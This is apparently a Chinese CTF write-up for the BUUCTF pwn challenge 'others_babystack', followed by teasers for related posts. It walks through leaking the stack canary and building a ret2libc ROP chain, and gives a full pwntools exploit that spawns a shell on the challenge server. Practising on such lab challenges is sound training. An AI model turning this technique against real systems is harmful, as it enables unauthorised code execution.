others_babystack

附件

步骤:

  1. 例行检查,64位程序,开了挺多保护
  2. 本地试运行一下程序
  3. 64位ida载入,看main函数

    1是read函数,存在栈溢出;2是puts函数,3退出

利用思路

  1. 泄露canary
    由于存在canary,我们首先要想办法泄露出它的值来绕过canary保护,puts函数在输出的时候是遇到’\x00’ 才会结束,我们都知道canary跟在ebp之后,因此我们直接填充‘a’到ebp,正好 可以把canary的截断符覆盖,再输出,就会连canary输出来了,成功泄露了canary。
r.sendlineafter(">>",'1')

payload='a'*(0x80+8)

r.sendline(payload)

r.sendlineafter('>>','2')

r.recvuntil('a\n')

canary=u64(r,recv(7).rjust(8,'\x00'))

print hex(canary)
  1. 获取shell
    在得到程序里的ebp之后,就可以利用普通的ret2libc的方式去获取shell了,(64位传参要用寄存器的顺序是rdi,rsi,rdx,rcx,r8,r9)
    我这里打算使用puts函数去泄露puts的got表,参数只有一个,因此只用到了一个rdi寄存器,找一下设置它值的指令ROPgadget --binary babystack |grep "pop rdi"


泄露puts函数的got表地址,找到libc版本

pop_rdi=0x400a93

puts_got=elf.got['puts']

puts_plt=elf.plt['puts']

main_addr=0x400908

payload='a'*(0x80+8)+p64(canary)+p64(0)

payload+=p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)

r.sendlineafter(">>",'1')

r.sendline(payload)

r.sendlineafter(">>",'3')

r.recv()

puts_addr=u64(r.recv(6).ljust(8,'\x00'))

libc=LibcSearcher('puts',puts_addr)

计算system和bin/sh在程序里的实际地址,构造rop攻击

libc_base=puts_addr-libc.dump('puts')

system=libc_base+libc.dump('system')

binsh=libc_base+libc.dump('str_bin_sh')

payload='a'*(0x80+8)+p64(canary)+p64(0)

payload+=p64(pop_rdi)+p64(binsh)+p64(system)

r.sendlineafter('>>','1')

r.sendline(payload)

r.sendlineafter('>>','3')

完整exp

from pwn import *

from LibcSearcher import *

r=remote('node3.buuoj.cn',28530)

#r=process('./babystack')

elf=ELF('./babystack')

context.log_level='debug'

#泄露canary

r.sendlineafter(">>",'1')

payload='a'*(0x80+8)

r.sendline(payload)

r.sendlineafter('>>','2')

r.recvuntil('a\n')

canary=u64(r.recv(7).rjust(8,'\x00'))

print hex(canary)

pop_rdi=0x400a93

puts_got=elf.got['puts']

puts_plt=elf.plt['puts']

main_addr=0x400908

#泄露puts函数的got表地址

payload='a'*(0x80+8)+p64(canary)+p64(0)

payload+=p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)

r.sendlineafter(">>",'1')

r.sendline(payload)

r.sendlineafter(">>",'3')

r.recv()

puts_addr=u64(r.recv(6).ljust(8,'\x00'))

#找到对应的libc版本

libc=LibcSearcher('puts',puts_addr)

#计算system函数和字符串‘/bin/sh’在程序里的实际地址

libc_base=puts_addr-libc.dump('puts')

system=libc_base+libc.dump('system')

binsh=libc_base+libc.dump('str_bin_sh')

#构造rop攻击获取shell

payload='a'*(0x80+8)+p64(canary)+p64(0)

payload+=p64(pop_rdi)+p64(binsh)+p64(system)

r.sendlineafter('>>','1')

r.sendline(payload)

r.sendlineafter('>>','3')

r.interactive()

[BUUCTF]PWN——others_babystack的更多相关文章

  1. [BUUCTF]PWN——babyheap_0ctf_2017

    [BUUCTF]PWN--babyheap_0ctf_2017 附件 步骤: 例行检查,64位,保护全开 试运行一下程序,看到这个布局菜单,知道了这是一道堆的题目,第一次接触堆的小伙伴可以去看一下这个 ...

  2. (buuctf) - pwn入门部分wp - rip -- pwn1_sctf_2016

    [buuctf]pwn入门 pwn学习之路引入 栈溢出引入 test_your_nc [题目链接] 注意到 Ubuntu 18, Linux系统 . nc 靶场 nc node3.buuoj.cn 2 ...

  3. [BUUCTF]PWN——hitcontraining_uaf

    [BUUCTF]--hitcontraining_uaf 附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,非常常见的创建堆块的菜单 32位ida载入分析,shift+f12查看程序里的 ...

  4. BUUCTF PWN部分题目wp

    pwn好难啊 PWN 1,连上就有flag的pwnnc buuoj.cn 6000得到flag 2,RIP覆盖一下用ida分析一下,发现已有了system,只需覆盖RIP为fun()的地址,用peda ...

  5. buuctf --pwn part2

    pwn难啊! 1.[OGeek2019]babyrop 先check一下文件,开启了NX 在ida中没有找到system.'/bin/sh'等相关的字符,或许需要ROP绕过(废话,题目提示了) 查看到 ...

  6. buuctf pwn wp---part1

    pwn难啊 1.test_your_nc 测试你nc,不用说,连上就有. 2.rip ida中已经包含了system函数: 溢出,覆盖rip为fun函数,peda计算偏移为23: from pwn i ...

  7. [BUUCTF]PWN——pwnable_hacknote

    pwnable_hacknote 附件 步骤: 例行检查,32位程序,开启了nx和canary保护 本地试运行看一下大概的情况,熟悉的堆的菜单 32位ida载入 add() gdb看一下堆块的布局更方 ...

  8. [BUUCTF]PWN——ciscn_2019_es_7[详解]

    ciscn_2019_es_7 附件 步骤: 例行检查,64位程序,开启了nx保护 本地试运行一下看看大概的情况 64位ida载入,关键函数很简单,两个系统调用,buf存在溢出 看到系统调用和溢出,想 ...

  9. [BUUCTF]PWN——mrctf2020_easyoverflow

    mrctf2020_easyoverflow 附件 步骤: 例行检查,64位程序,保护全开 本地试运行的时候就直接一个输入,然后就没了,直接用64位ida打开 只要满足18行的条件,就能够获取shel ...

随机推荐

  1. java-UDP协议接收和发送数据

    UDP发送数据的步骤: A:创建发送端的Socket服务对象 B:创建数据,并把数据打包 C:通过Socket对象的发送功能发送数据包 D:释放资源 public class SendDemo {   ...

  2. idea配置MyBatis

    新建工程 删掉src 创建Module 在工程中的porn.xml输入以下依赖 <?xml version="1.0" encoding="UTF-8"? ...

  3. idea反编译失败 /* compiled code */的解决方法

    最近在研究源码,但是我的idea有点奇怪,有的文件可以反编译,但有的文件反编译后方法内容是 /* compiled code */,查了下说是反编译失败了,都说是插件的原因. 然后我看了下idea的插 ...

  4. html+css第八篇滑动门和可爱的css精灵

    滑动门: 滑动门并不是一项全新的技术,它是利用背景图像的可层叠性,并允许他们在彼此之上进行滑动,以创造一些特殊的效果. CSS精灵 CSS Sprites在国内很多人叫CSS精灵,是一种网页图片应用处 ...

  5. 解决fatal: unable to access '': Failed to connect to 127.0.0.1 port 1181: Connection refused的问题

    今天把项目提交的git远程的时候遇到一个问题 fatal: unable to access '': Failed to connect to 127.0.0.1 port 1181: Connect ...

  6. Linux检测磁盘空间

    在linux中,文件系统将所有的磁盘都并入一个虚拟目录下,在使用新的存储媒体之前,需要把它放到虚拟目录下,这项工作称为挂载. 1.mount命令 mount会输出当前系统上挂载的设备列表,要在虚拟目录 ...

  7. Codeforces 356E - Xenia and String Problem(哈希)

    Codeforces 题面传送门 & 洛谷题面传送门 首先显然一个 gray 串的长度只可能是 \(2^k-1\),其中 \(k\in\mathbb{Z}\). 考虑将一个字符改成另外一个字符 ...

  8. Topcoder 10748 - StringDecryption(dp)

    题面传送门 神仙题. 首先这个两次加密略微有点棘手,咱们不妨先从一次加密的情况入手考虑这个问题.显然,一次加密等价于将加密过的序列划分成若干段,每一段都是 \(xd\) 的形式表示这一段中有 \(x\ ...

  9. dlang 安装

    刷论坛看到TIOBE排行榜,排名靠前的基本是C.C++.java.python之类的语言,常用的R语言近几年排名一路走高,前20基本变化不大. 后面发现第二十九位居然有个叫做D的语言,看了下和C语法很 ...

  10. 以DevExpress开发的WinFrom程序的多语言功能的实现

    以DevExpress开发的WinFrom程序的多语言功能的实现 写在前面: 多语言切换功能在Winform程序中是经常遇到的需求,尤其是需要给国外客户使用的情况下,多语言功能是必不可少的.前一段时间 ...